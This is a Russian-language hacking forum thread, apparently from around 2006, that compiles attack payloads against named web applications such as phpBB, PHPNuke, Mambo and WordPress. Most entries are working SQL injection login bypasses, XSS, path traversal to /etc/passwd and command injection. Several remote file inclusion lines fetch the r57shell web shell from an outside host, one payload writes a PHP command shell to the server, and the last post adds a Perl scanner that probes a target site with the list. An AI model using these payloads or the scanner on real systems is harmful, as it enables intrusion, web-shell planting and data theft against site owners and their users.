Энциклопедия уязвимых скриптов

[Robin Gud]

Эта коллекция уязвимых скриптов собиралась DIAgen'ом. Если кому-нибудь пригодится, значит все сделано не зря
Можно периодически ее пополнять, потом набросаю сканер уязвимостей

Форумы

phpBB v.2.0.15 Выполнение php кода в viewtopic.php
viewtopic.php?t=1&highlight='.print f(md5(test)).'
PBLang 4.65 Локальный include файлов
setcookie.php?u=../../../../../../../../../../etc/passwd%00
setcookie.php??u=../../../../../../../../../../boot.ini%00
PHPTB v.2.0 Include файлов
/classes/admin_o.php?absolutepath= http://rst.void.ru/download/
r57shell.txt
MailGust v.1.9 SQL Injection
post запрос index.php
method=remind_password&list=maillis tuser&fromlist=maillist&frommethod= showhtmllist&email=1%27%
20union%20select%20%2A%20from%20for ce_sql_error%2F%2A%40hotmail%2Ecom& submit=Ok&showAvatar
Chipmunk Forum XSS
newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:aler t(%2527xss%2527)
%3E%3C/IFRAME%3E
oaboard v.1.0 SQL Injection
forum.php?channel=0%20union%20selec t%20*%20from%20force_mysql_table_er ror
Phorum 5.0.20 SQL Injection
search.php?1,search=%20,page=1,matc h_type=ALL,match_dates=30,match_for um=ALL,body=
1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error
Cyphor 0.19 XSS
/include/footer.php?t_login=%3Cscript%3Ealer t(%22XSS%22)%3C/script%3E
W-Agora 4.2.0 XSS
/templates/admin/login_form.php?msg_login=%3Cscript% 3Ealert(%22XSS%22)%3C/script%3E
WizForum 1.20 SQL Injection
ForumTopicDetails.php?TopicID=11111 111%20union%20Select%20*%20from%20E ronatedInex
istentTable
EkinBoard 1.0.3 SQL Injection
admin/index.php ?page=general&step=2
Cookie: username=%27or+isnull%281%2F0%29+AN D+level%3D3%2F%2A; password=
Snitz Forums 2000 v.3.4.05 XSS
post.asp ?method=Topic&FORUM_ID=1&CAT_ID=1&t ype=xss-${random}
PHP-Post 1.0 XSS
profile.php ?user='%3CIFRAME%20SRC=javascript:a lert(%2527xss-${random}%2527)%3E%3
C/IFRAME%3E
WSN Forum 1.21 SQL Injection
memberlist.php ?action=profile&id=1'%20select%20*% 20from%20force_mysql_warning
sCssBoard 1.12 XSS
index.php ?act=search-results
post search_term=%3Cscript%3Ealert%28%27 wvs-${random}%27%29%3C%2Fscript%3E+&sor tby=relevancy
freeForum 1.1 SQL Injection
forum.php?mode=thread&thread=force_ mysql_fetch_object_warning
Orca Forum 4.3.b SQL Injection
forum.php ?msg=2'force_mysql_num_rows_warning
Pearl Forums 2.4 SQL Injection
index.php ?mode=forums&forumId=1%20union%20se lect%20*%20from%20force_error
SimpleBBS v.1.1 Выполнение php кода
index.php ?v=newtopic&c=1
POST name=<?php echo md5("test");?>&subject=mysubject&me ssage=mymessage&sendTopic=Send
ADP Forum v.2.0.2 Информация о пользователя
/users/
ADN Forum v.1.0b SQL Injection
verpag.php?pagid=999'%20and_force_m ysql_error/*
MyBuletinBoard v.1.0.2 Раскрытие префикса таблицы
search.php?s=de1aaf9b&action=do_sea rch&keywords=a&srchtype=3
MyTopix v.1.2.3 SQL Injection и раскрытие пути срипта
/modules/logon.mod.php
Pentacle In-Out Board v.6.03.0.0080 SQL Injection
login.asp POST username=anypassword&userpassword=% 27+or+%271%27%3D%271&Submit=Log+in
Battleaxe Software Forums v.2.0 XSS
failure.asp ?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext


PHP Библиотеки

PEAR XML_RPC 1.3.0 Выполнение команд (подвержены Affected PEAR XML_RPC versions (up to 1.3.0). Affected web applications:TikiWiki. PostNuke
Drupal. b2evolution. b2. phpGroupWare. eGroupware. Serendipity Weblog. phpAdsNew. Max Media Manager. phpWiki. Blog:CMS. CivicSpace )
xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php
POST <?xmlversion="1.0"?><methodCall><me thodName>test.method</methodName><params><param><value><n ame>','')); printf(md5(acunetix_wvs_security_te st)); exit;//</name></value></param></params></methodCall>
ADOdb
1) SQL Injection
/server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
2) Выполнение функции php
/tests/tmssql.php?do=phpinfo


Network tools

phpLDAPadmin 0.9.6 Выполнение php кода
welcome.php ?custom_welcome_page= http://rst.void.ru/download/r57shell.txt
Netquery [host] Произвольное выполнение команд
nquser.php POST
1) querytype=dig&host=a%27%7Ccat%20%27 %2Fetc%2Fpasswd&digparam=ANY&x=11&y =17
2) querytype=dig&host=%7Ccat%20%2Fetc% 2Fpasswd&digparam=ANY&x=11&y=17


Календари и Планировщики

phpCommunityCalendar v.4.0.3 Обход Логина
webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+% 2F*&Password=&Returned=1
Calendarix v.1.6 SQL Injection
cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*& password=any
Teca Diary Personal Edition v.1.0 SQL Injection
index.php?mm='%20force_sql_error&yy =2006
CALimba v.0.99.2 Sql Injection
index.php POST ute_login=%27%29+or+isnull%281%2F0% 29%2F*&ute_password=anypassword&cmd OK=Login%21
Maian Events v.1.00 SQL Injection
menu.php?month='forceerror'


Блоки новостей

myBloggie 2.1.3 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29+% 2F*&passwd=&submit=Log+In
Simplog 0.9.1 SQL Injection
archive.php?blogid=force_error_for_ test_reason
Zomplog 3.4 XSS
get.php?username=%3Cbr%3E%3Cb%3Exss %3C/b%3E%3Cbr%3E
CuteNews 1.4.1 Shell Injection
show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20e cho%20md5(%22test%22)
;%20die;?%3E.%22%20HTTP/1.0\r\n
Cute News 1.4.1 Local File Inclusion
show_archives.php?template=../../../../../../../../../../etc/passwd%00
show_archives.php?template=../../../../../../../../../../boot.ini%00
SimpleBlog v.2.1 SQL Injection
default.asp ?view=archives&month=%22generate_er ror&year=2004
Bit5blog v.8.1 SQL Injection
admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2 F*&password=%27+or+isnull%281%2F0%2 9%2F*
WebspotBlogging v.3.0 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29%2 F*&password=anypassword
e-moBLOG v.1.3 SQL Injection
/admin/index.php POST login=aaa%27+union+select+%27bbb%27 %2C+%27161da2fa81d32d4071ee16f7f77c b463%27%2F*&password=
any_password
miniBloggie v.1.0 SQL Injection
login.php POST user=%27+or+isnull%281%2F0%29%2F*&p wd=%27+or+isnull%281%2F0%29%2F*&sub mit=Log+In
Text Rider v.2.4 Список пользователей
/data/userlist.txt
AndoNET Blog SQL Injection
index.php?ando=comentarios&entrada= 1'generate%20error
Loudblog v.0.4 PHP Code Injection
/loudblog/inc/backend_settings.php?GLOBALS[path]= http://rst.void.ru/download/r57shell.txt
PluggedOut Blog v.1.9.9c SQL Injection
exec.php?action=comment_add&entryid =force_error
Clever Copy v.3.0 SQL Injection
mailarticle.php?ID='UNION%20SELECT% 200,0,0,0,0,0,username,password,0,0 ,0,0,0,0,0,0,0
%20FROM%20CC_admin/*
Magic News Lite v.1.2.3 Code Injection
preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt
WordPress v.2.0.1 Раскрытие пути
/wp-includes/default-filters.php
sBlog v.0.7.2 XSS
search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E
Maian Weblog v.2.0 SQL Injection
print.php?cmd=log&entry=1'%20or%20g enerate_error=2


Faq Systems

phpMyFAQ 1.5.1 SQL Injection
admin/password.php POST username=%27+or+isnull%281%2F0%29+% 2F*&email=1@2.com
A-FAQ 1.0 SQL Injection
faqDsp.asp?catcode=12%20union%20sel ect%20name%20from%20msysobjects%20i n%20'\nopath\
sqlerr
Atlantis Knowledge Base Software v.3.0 SQL Injection
search.php POST searchStr=%25%27+union+select+*+fro m+force_mysql_warning%2F*
ASP Survey v1.10 SQL Injection
/Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&De st=http%3A%2F%2Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2
FDefault.asp
Owl v.0.82 File Inclusion
/lib/OWL_API.php?xrms_file_root=nonexist ent_test_includefile%00


Web Portals

PHPNuke 7.8 Remote Directory Traversal
modules.php?name=Search&file=../../../../../../../../../../etc/passwd%00
modules.php?name=Search&file=../../../../../../../../../../../boot.ini%00


Партнерские системы

TWiki rev Parameter Remote Command Execution Vulnerability
view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cb oot%2Eini
PmWiki 2.0.12 q-Parameter XSS
pmwiki.php ?n=Site.Search?action=search&q=test _search_item%27%20onMouseOver%3D%27 alert%28%22wvs-xss-magic
-string-${random}%22%29%3B%27%20

ProjectApp v.3.3 XSS
default.asp ?skin_number=XSS.css%22%3E%3Cscript %3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C
IntranetApp v.3.3 XSS
login.asp ?ret_page=a%22%3E%3Cscript%3Ealert( 'xss-${random}')%3C/script%3E%3C%22
dotproject v.2.0.1 File Inclusion
includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt
Qwiki v.1.5.1 XSS
index.php?page=Home&from='%3Cscript %3Ealert(%22xss-${random}%22)%3C/script%3E


Administration Tools

phpMyAdmin grab_globals.lib.php
libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
../../../etc/passwd&subform[1]
libraries/grab_globals.lib.php POST
usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
../../../boot.ini&subform[1]
phpMyAdmin XSS
queryframe.php?lang=en-iso-8859-1&server=1&hash=">='%3C/a%3E%3CIFRAME%
20SRC=javascript:alert(%2527xss%252 7)%3E%3C/IFRAME%3E
phpMyAdmin Раскрытие пути
libraries/charset_conversion.lib.php ?cfg[AllowAnywhereRecoding]=true&
allow_recoding=true)


CMS Systems

PHP-Fusion 6.00.109 SQL Injection
faq.php?cat_id=1%27%20or%20force_my sql_error%3D%272
MySource 2.14.0 File Inclusion
init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt
e107 v0617 SQL Injection
e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F* &a_password=&usubmit=Continue
lucidCMS 1.0.11 SQL Injection
index.php?command=panel
PhpWebThings 1.4.4 SQL Injection
forum.php?forum=-1%20union%20select%20password,passw ord,null,null%20from%
20test_mysql_injection%20where%20ui d=1/*
Envolution v.1.1.0 SQL Injection
modules.php?op=modload&name=News&fi le=index&catid=%221%22%20AND%20forc e_error=error
Acidcat v.2.1.13 SQL Injection
default.asp?ID=26%20union%20select% 201,2,2,3,password,5,6%20from%20Con figuration
DEV v1.5 SQL Injection
index.php?session=0&action=openforu m&cat=force_error
SiteEnable v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript %3Ealert('xss-${random}')%3C/script%3E%3C%22
PortalApp v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript %3Ealert('xss-${random}')%3C/script%3E%3C%22
Typo3 v.3.8.1 Раскрытие пути
/tslib/showpic.php
RunCMS v.1.3a5 XSS
/modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3 Ealert('xss-${random}');
%3C/script%3E%3Cbr%20name=%22nothing
Mambo v.4.5.3h SQL Injection
/index.php POST username=%27or+isnull%281%2F0%29%2F *&passwd=anypassword&option=login&S ubmit=Login&op2=login&lang
=english&return=${file}&message=0
Dragonfly CMS v.9.0.6.1 XSS
/index.php POST search=%22%3E%3Cscript%3Ealert%28%2 2wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topi c=0&cat
=0&news_search_comments=0&coppermin e=
Nodez v.4.6.1.1 XSS
/index.php?node=system&op=block%3Csc ript%3Ealert(%22wvs-xss-magic-string-${random}%22)
%3C/script%3E&block=3&bop=more
XOOPS v.2.0.11 SQL Injection
/xmlrpc.php POST <?xml version="1.0"?><methodCall><methodN ame>blogger.getUsersBlogs</methodName><params><param><value>
<string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>


Gallery Applications

Gallery "g2_itemId" локальный иклуид
main.php?g2_itemId=/../../../../../../../../../../../boot.ini%00
main.php?g2_itemId=/../../../../../../../../../../../etc/passwd%00
/upgrade/index.php ?stepOrder[]=../../../../../../../../include_inexistent_file.txt%00
Coppermine Photo Gallery v.1.4.2 игнорировать конфигурацию
relocate_server.php POST continue=1
Instant Photo Gallery v.1.0 SQL Injection
portfolio.php?cat_id="force_sql_err or
Enhanced Simple PHP Gallery v.1.7 Раскрытие пути
index.php?dir=inexistent_directory
WhiteAlbum v.2.5 SQL Injection
pictures.php?dir=force_mysql_warnin g
LinPHA v.1.0 Local File Inclusion
/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
/docs/index.php?lang=/../../../../../../../../../../boot.ini%00


Script Collections

Codegrrl Arbitrary Local File Inclusion
protection.php?action=logout&siteur l=../../../../../../../../../../etc/passwd%00
protection.php?action=logout&siteur l=../../../../../../../../../../boot.ini%00
Techno Dreams Products SQL Injection
admin/login.asp POST userid=%27union+all+select+%271%27% 2C%271%27+from+admin+where+%27%27%3 D%27&passwd=1&submit=Login
AlstraSoft Template Seller Pro 3.25 File Inclusion
include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box
AlstraSoft Affiliate Network Pro v.7.2 SQL Injection
admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F* &passwd=&B1=Login
OpenEdit v.4.0 XSS
/store/search/results.html ?page=%3Ciframe%3Exss-${random}%3C/iframe%3E


Электронная коммерция

Zend Cart 1.2.6 SQL Injection
admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2 C%27%3C%3Fphp+system%28%24_GET%5Bcm d%5D%29%3B+%3F%3E%27%2C0
+INTO+OUTFILE+%27shell.php%27+FROM+ force_table_error%2F*&submit=resend
Lizard Cart CMS v.1.0.4 SQL Injection
detail.php?id=-1'
My Amazon Store Manager v1.0 XSS
/search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
CRE Loaded v.6.15 XSS
/admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/
script%3E&Mode=apparel
NZ Ecommerce SQL Injection
/index.php?action=Information&inform ationID=1%20and%20generate_error=er ror


Guest Book Applications

Ades Guestbook v.2.0 XSS
read.php ?pageNum_rsRead=1&totalRows_rsRead= %3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3
C%2Fscript%3E
Mantis 1.00 File Inclusion
bug_sponsorship_list_view_inc.php?t _core_path=../../../../../../../../etc/passwd%00
bug_sponsorship_list_view_inc.php?t _core_path=../../../../../../../../../boot.ini%00
Flyspray 0.9.8 XSS
index.php ?tasks=all%22%3E%3Cscript%3Ealert%2 8%22XSS%22%29%3 C%2Fscript%3E%26project%3D0
Gemini v.2.0 XSS
/issue/createissue.aspx?rtcDescription$Rad Editor1=1><script>alert(${random}); </script>


Другие инструменты

Digital Scribe 1.4 SQL Injection
login.php POST username=%22+or+isnull%281%2F0%29+% 2F*&pass1=&submit=Login
ATUTOR 1.5.1 SQL Injection
password_reminder.php POST form_password_reminder=true&form_em ail=%27
PHP Advanced Transfer Manager System локальный include
viewers/txt.php?filename=../../../../../../../../../../boot.ini%00
viewers/txt.php?filename=../../../../../../../../../../etc/passwd%00
Chipmunk Topsites XSS
recommend.php ?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:aler t(%2527xss%2527 )%3E%3C/IFRAME%3E
Chipmunk Directory XSS
recommend.php ?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:aler t(%2527xss%2527 )%3E%3C/IFRAME%3E
Gcards 1.44 limit parameter SQL Injection
news.php ?limit=force_sql_error
phpSysInfo 2.3 XSS
index.php ?VERSION=%22%3E%3Cscript%3Ealert('F ORCE_XSS')%3C/script%3E
Advanced Poll 2.03 XSS
popup.php ?poll_ident=%3Cscript%3Ealert(%22wv s-xss-magic-string-${random}%22)%3C/script%3E
PHPGreetz 0.99 Remote File Include
content.php?content=http://rst.void.ru/download/r57shell.txt
eFiction 1.1 XSS и SQL Injection
titles.php?action=viewlist&let='%20 UNION%20SELECT%200,0,'%3Cscript%3Ea lert(%2 2wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,pen name,0%20FROM%20fanfiction_authors% 20/*
Google API Search Engine v.1.3.1 XSS
index.php?REQ=%3Cscript%3Ealert%28% 27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmi t=Submit
phpArcadeScript v.2.0 XSS
/includes/tellafriend.php?about=game&gamename =%3Cscript%3Ealert(${random});%3C/script%3E

 

[LEE_ROY]

Пригодится полюбому, спс humbsup:

 

[DIAgen]

Да дано я выложил это, прям 01.06.2006 числа, и только сейчас появилось на xss.pro/)))
Да надо будет дополнить все это дело и выложить, может прям кому нибудь поможет!!!

 

[@$_terr_X]

DIAgen
ну так чего ты медлишь ждёмс)

 

[[br]]

http://someshit.nm.ru/br/cgi.txt

тут собранная мной в свое время.. единтсвенное полгода как уже не пополнялась.

2Диаген стукни в новую аську, просил же =)

 

[DIAgen]

Update

Форумы
phpBB v.1.20 локальный инклуид
/admin/admin_hacks_list.php?setmodules=3D1&board_conf=ig[default_lang]=
3Denglish&phpEx=3D${random}
MyBulletinBoard v.1.1.5 SQL инъекция
http://www.milw0rm.com/exploits/2012
dotNetBB v2.42EC.SP3 XSS
/iforget.aspx POST em=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E
Toast Forums v.1.6 XSS
?action=posts&sub=search&fid-1&author=r0t&subject=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3C
SKForum v.1.5 XSS
?areaID=%3Cscript%3Ealert('XSS')%3B%3C/script%3E&time=%3Cscript%3Ealert('XSS')%3B%3C/script%3E
Invision Power Board v.2.0.3 XSS
Шаг 1
?act=Search&CODE=01 
POST
keywords=test&namesearch=&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=
last_post&sort_order=desc&search_in=posts&result_type=topics
Шаг 2
GET
%2F%24%7B%69%6E%63%6C%75%73%69%6F%6E%5F%70%61%72%61%6D%65%74%65%72%73%7D%3D%22%3E%3C%73%
63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%74%65%73%74%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Invision Power Board v2.1.6 SQL инъекция
CLIENT-IP: ' UNION SELECT 'test',1,1,1/*
WWWThreads Forum XSS
calendar.php?week=%22%3E%3Cscript%3Ealert(${random})%3C/script%3E
MercuryBoard v.1.1.4 SQL инъекция
?a=active - User-Agent: 123456'
Integramod Portal  v.2.0 локальный инклуид
?phpbb_root_path=http://evalphp

Календари и Планировщики
WebCalendar v.4.0 SQL инъекция
?EventID=arbitrary_id%20or%20sql_injection_tet=test
Connect Daily v.3.2.9  XSS
?start=<script>alert("XSS");</script>
Thyme v.1.3 XSS
POST searchfor=%3Cscript%3Ealert%28%22${random}%22%29%3B%3C%2Fscript%3E
MaxxSchedule v.1.0 XSS
?Error=<script>alert("XSS");</script>
MultiCalendars v.3.0  SQL инъекция
?calsids=sql_error
myEvent v.1.4 php инклуид
?myevent_path=http://evalphp?
TeamCal Pro v.2.8.001 локальный инклуид
?tc_config[app_root]=http://evalphp?

Блоки новостей
myBloggie v.2.1.4 SQL инъекция
POST title='generate_error)/*&url=http://
Simplog v.0.9.1 Локальный инклуид
?cmd=ls%20-la&s=http://evalphp%00
Cute News v.1.4.5 XSS
?dosearch=yes&title="><script>alert("XSS");</script>&user=&from_date_day=&from_date_month=
&from_date_year=&to_date_day =&to_date_month=&to_date_year=
WordPress v.2.0.3 SQL инъекци
?paged=-1
Simple PHP Blog v.0.4.7.1 Локальный инклуид
?blog_language=../../../../../../../../../../../inexistent_directory/inexistent_file.php%00
EasyMoblog v.0.5.1 XSS
?i=nothing.txt%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cimg%20src=%22img/posts/nothing.txt%22
bMachine v.2.9b XSS
POST key=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3C
Artmedic Newsletter v.4.1.2 Выполнение php
?logfile=info.php&logtime=000060&email=%3C?php%20echo%20md5(%22test%22);%20?%3E
Eggblog v.3.6 SQL инъекция
?id='1234567
pppBlog v.0.3.8 Локальный инклуид
?files[0]=../config/admin.php
BLOG:CMS v4.0.0 SQL инъекция
?id=9999999'/**/UNION/**/SELECT/**/mpassword/**/FROM/**/nucleus_member/**/WHERE/**/mnumber=1/*
DeluxeBB v1.08 SQL инъекция
Cookie: membercookie=test;memberid=1;memberpw=')or isnull(1/0) or(1='

Различные скрипты (редкие)
Digital Scribe 1.4 SQL
POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login
ATUTOR 1.5.1 SQL
POST form_password_reminder=true&form_email=%27
PHP Advanced Transfer Manager System Disclosure
?filename=../../../../../../../../../../etc/passwd%00
Gcards v.1.45 SQL
username=%27+or+isnull%281%2F0%29%2F*&userpass=%27+or+isnull%281%2F0%29%2F*
PHPGreetz 0.99 Инклуид
?content=http://evalphp/
eFiction 1.1 SQL-XSS
?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%22XSS%22)%3C/script%3E'
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
DoceboLMS 2.04 Инклуид
?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder=
Enterprise Connector v.1.02  SQL
POST loginid='or isnull(1/0) /*
PhpGedView v.3.3.7 Инклуид
?PGV_BASE_DIRECTORY=../../../../../../../../../etc/passwd
PHPjournaler v.1.0 SQL
?readold=999%20union%20select%201,password,3,4,name,6%20from%20eronated_table_name/*
PHPStatus v.1.0 SQL
POST username=%27or+isnull%281%2F0%29+%2F*&password=anypassword&submit=Login
NetOffice v.2.5.3-pl1 SQL
POST loginForm=%27+or+acuerro%3D1%2F*&send=Send
phpListPro v.2.0.0  Инклуид
?returnpath=http:/evalphp%00
phpWebFTP v.3.2 Локальный инклуид
POST server=&port=21&user=qqq&password=qqq&language=../../../../../../../../../../etc/passwd%00
EDirectoryPro 2006-05-09 SQL
?Category=all&keyword=sql_error%27&mode=date
Timesheet PHP 1.2.1 SQL
POST redirect=%2Ftest%2Ftimesheet_1_2_1%2Fcalendar.php&username=testuser%27&password=
testpassword%27&Login=submit
Web-News v.1.6.3 Инклуид
?content_page=http://evalphp?

Faq Systems
Absolute FAQ Manager v.4.0  XSS
POST topicid=1&question=%3Cscript%3Ealert%28%22$XSS%22%29%3B%3C%2Fscript%3E&imageField.x=
14&imageField.y=6
PHPKB v.1.5 XSS
POST searchkeyword=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&category=0&Submit=
Search+Knowledge+Base

Web Portals
SQuery v.4.5 (phpNuke module) Инклуид
?libpath=http://evalphp?

Партнерские системы
PHPCollab v.2.4 SQL
POST loginForm=%27error%27+or+error
Tiki Wiki v.1.9.3.1 XSS
?days=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert(%22XSS%22);%3C/scr%3C/script%3Eipt%3E%3E
DokuWiki v.2006-03-09b dwpage.php php-eval
X-FORWARDED-FOR: <?php echo md5("acunetix_test_text");?>

Administration Tools
Confixx 3 Professional v.3.1.2 SQL
?SID='%22
Pivot v1.30 RC2 
edit_new.php?Paths[extensions_path]=ftp://username:password@somehost.com/
edit_new.php?Paths[extensions_path]=/etc/passwd%00
blogroll.php?fg=[XSS]
blogroll.php?line1=[XSS]
blogroll.php?line2=[XSS]
blogroll.php?bg=[XSS]
blogroll.php?c1=[XSS]
blogroll.php?c2=[XSS]
blogroll.php?c3=[XSS]
blogroll.php?c4=[XSS]
editor/edit_menu.php?name=[XSS]
editor/edit_menu.php?js_name=[XSS]
photo.php?h=><script>alert(document.cookie)</script>
photo.php?w=><script>alert(document.cookie)</script> 
cPanel v.10.8.2.118 XSS
?dir=%3E%3Cscript%3Ealert(XSS)%3C/script%3E

CMS Systems
Simpleboard v1.1.0 (Mambo component) Инклуид
?sbp=http://evalphp?
Tim-online PHPBB v1.2.4RC3 (Mambo component) Инклуид
?phpbb_root_path=http://evalphp?
Galleria v1.0 (Mambo component) Инклуид
?mosConfig_absolute_path=http://evalphp?
Pearl For Mambo v.1.6  Инклуид
?GlobalSettings[templatesDirectory]=http://evalphp?
Videodb (Mambo component) v.0.3 Инклуид
?mosConfig_absolute_path=http://evalphp?
Loudmouth (Mambo component)  v.4.0 Инклуид
?mosConfig_absolute_path=http://evalphp?
Mambo up to v.4.6.1 SQL
Cookie: usercookie[password]=%27 or 1=1/*; usercookie[username]=admin
99articles Инклуид
?page=http://evalphp?
OpenPHPNuke v.2.3.3 Инклуид
?root_path=http://evalphp?
Ottoman  v.1.1.2 Локальный инклуид
?default_path=path%00
Ajax Portal v.3.0 SQL
POST rs=searchBoxes&rst=&rsrnd=1152608713921&rsargs[]=search%20%25%27%29%20LIMIT%200%20
UNION%20SELECT%201337%2Cusername%2Cpassword%2Cgenerate_error%20FROM%20p${random}/*&rsargs[]=all&rsargs[]=0
MyPHP CMS v.0.3 Инклуид
?installed=23&domain=http://evalphp?
Plume CMS v1.3 Инклуид
?_PX_config[manager_path]=http://evalphp?
SmartSiteCMS v1.0  Инклуид
?root=http://evalphp?
GeekLog v1.4.0 Инклуид
?_CONF[path]=http://evalphp?
Etomite CMS v.0.6.1 SQL
POST rememberme=1&location&username=99999999$'/**/UNION/**/SELECT/**/0,'acunetixtest',
MD5('acunetixtest'),0,0,0,0,0,0,0,0,0,0,0,0,0,0/*&password=acunetixtest&thing&submit=Login&licenseOK=1
SaveWebPortal v.3.4 Инклуид
?SITE_Path=http://evalphp?
phpFullAnnu v.5.1 Инклуид
?repmod=http://evalphp?

Gallery Applications
JetPhoto Server v.1.x XSS
?name=%22%3E%3Cscript%3Ealert(XSS);%3C/script%3E
photokorn v.1.542 SQL
?action=showgal&cat=[sql]
PhotoPost v.4.6 Инклуид
?PP_PATH=http://evalphp?

Development Tools
Mantis 1.00 Локальный инклуид
?t_core_path=../../../../../../../../etc/passwd%00
Flyspray 0.9.8 XSS
?tasks=all"><script>alert("XSS")</script>&project=0
Gemini v.2.0 XSS
?rtcDescription$RadEditor1=1><script>alert(XSS);</script>
paBugs v.2.0b3 Инклуид 
?path_to_bt_dir=http://evalphp?

Электронная коммерция
QuickEStore v.7.9 SQL
?CFID=&CFTOKEN=&CategoryID=[sql]
Leadhound 2006-04-28  XSS
?login=<script>alert("XSS");</script>
SunShop Shopping Cart v.3.5 XSS
?action=item&id=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
OrbitHYIP v.2.0 XSS
?referral=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22XSS%22%29%3B%3C%2F%73%63%72%69%70%74%3E
CyberBuild 06.05.03 XSS
?SessionID=[%22%3E%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
PhpHostBot v.1.0 Инклуид
?page=http://evalphp?
PHP Simple Shop v.2.0 Инклуид
?abs_path=http://evalphp?
CubeCart v.2.0.7 XSS
?la_pow_by=%3Cscript%3Ealert(XSS)%3C/script%3E
osCommerce v.2.2 XSS
?zone=%3Cscript%3Ealert(XSS)%3C/script%3E

Ну тут уже так себе, не чего особеного нет!!!
Creative Community Portal v.1.1 SQL
?article_id='
WoWRoster v.1.5.0 Инклуид
?subdir=http://evalphp?
Popper v.1.41.r2 Инклуид
?form=http://evalphp?

 

[lance]

Хороший сборник. Неплохо было бы оформить в html и дополнить ссылками на эксплоиты.

 

[iron]

да не плохая подборка
можно еще попробовать написать скрипт который будет грабить описание уязвимостей с security сайтов и заносить их в эту базу

 

[pro5to]

автора не помню.. если кто в курсе отпишитесь

пак сканера (думаю сойдёт ) - +

#!/usr/bin/perl


use Socket;                           
$end   = "\r\n";                      
$cgi   = "vulln_scripts.txt";        
$out   = "found.txt";                 
$port  = 80;                          

$save_res = 1;                        
$show_res = 1;                        

$all   = 1;                           

print "\nEnter target (example microsoft.com): ";
$site = <STDIN>;
chomp($site);
print "Wait.........\n\n";

open (DAT, $cgi);                     
while ($script = <DAT>) {           
chomp($script);
if($script =~ /^eof/i) {
   last;
                       }

$iaddr = inet_aton ($site) || die "Error";
$paddr = sockaddr_in ($port, $iaddr) || die "Error";
$proto = getprotobyname ('tcp') || die "Error";
socket (SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error";
connect (SOCK, $paddr) || die "Error";
send (SOCK,"GET $script HTTP/1.0$end$end",0);

open (OUT, ">>$out");                
$str = <SOCK>;                    
if ($str =~ /200/) {                
   if ($save_res == 1) {
      print OUT $site.$script." - OK\n";
      #print OUT $script." - OK!\n";
                       }
   if ($show_res == 1) {
      print $site.$script." - OK!\n";
                       }
                   }
else {
   #if (($all == 1) && ($save_res == 1)) {
   #print "F*CK - "; write;
   #print OUT $site.$script." - SHIT\n";
   #                                     }
   if (($all == 1) && ($show_res == 1)) {
      #print "F*CK - "; write;
      print $site.$script." - SHIT\n";
                                        }
     }

format STDOUT =
@<<<<<<<<<<<<<<<
$script
.

close (OUT);                          
close (SOCK);
                        }             
close (DAT);                         

print "\nDone!\n";
#$end = <STDIN>;

